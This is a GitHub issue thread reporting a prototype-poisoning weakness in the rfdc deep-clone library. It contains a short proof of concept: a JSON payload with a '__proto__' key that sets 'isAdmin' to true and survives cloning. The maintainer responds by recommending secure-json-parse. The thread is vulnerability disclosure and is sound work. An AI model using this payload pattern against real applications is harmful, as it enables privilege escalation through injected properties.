davidmarkclements / rfdc

Really Fast Deep Clone
MIT License
643 stars 25 forks source link

Prototype Poisoning #45

Closed xclow3n closed 4 months ago

xclow3n commented 4 months ago

POC:

const clone = require('rfdc')({proto: false});

const x = JSON.parse(`{"__proto__":{"isAdmin": true}}`);

const f = clone(x)

console.log(f); // {}
console.log(f.isAdmin); // true

This code demonstrates how prototype poisoning can occur by cloning an object containing a proto property with default permissions using the rfdc library. The isAdmin property is injected into the object's prototype. Implications

Mitigation

Since this library has a lot of weekly downloads so there might multiple use cases that might be effected by this bug

mcollina commented 4 months ago

This library follows the same pattern of Object.assign() and similar utilities, as they don't protect from this.

I'll add a note with a recommendation to use secure-json-parse to mitigate.

xclow3n commented 4 months ago

perfect! thanks a lot